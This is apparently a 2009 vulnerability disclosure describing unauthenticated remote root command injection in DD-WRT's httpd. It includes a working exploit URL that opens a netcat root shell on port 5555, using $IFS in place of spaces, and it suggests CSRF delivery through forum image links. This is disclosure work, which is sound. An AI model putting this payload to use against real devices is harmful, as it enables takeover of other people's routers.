ddwrt-exec.txt
Posted on 21 July 2009
----------------------------------------------------------------------------------------- A remote root vulnerability in the DD-WRT's httpd service. The bug exists in the latest 24 sp1 version of the firmware. The problem is due to a number of bugs and bad software design decisions. Here is part of httpd.c: ......... (snip)............ method); server_dir : "/www",file); server_dir : "/www", file); ........................ Two issues there: 1) No metacharacters handling 2) Command gets executed even without successful authentication. You are not going to see any output if not authenticated though. ....................... ........... (snip).......... ------------ 3) issue 3: httpd runs as root :) Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can connect to the management web interface can get easily root on the device via his browser with an URL like: There is a catch though: whitespaces break it. Anyway, they can be easily replaced with shell variable like $IFS. So, getting root shell at 5555/tcp becomes as easy as typing this in your browser's url bar: http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS5555$IFS-e$IFS/bin/sh Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the problem: http://www.youtube.com/watch?v=UhDcXCVFrvM Fortunately, httpd by default does not listen on the outbound interface. However, this vulnerability can be exploited via a CSRF attack (the dd-wrt device's owner does not even need to have an authenticated session on the web UI which is bad, bad). However, a base authentication dialog will appear. In IE even this can be supressed, see this one: http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/ Unlike the already documented CSRF vulnerability ( http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated session. This means someone can even post some crafted [img] link on a forum and a dd-wrt router owner visiting the forum will get owned :) A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I would say :) Thanks krassyo at krassyo.info for his support :) Leka vecher :)
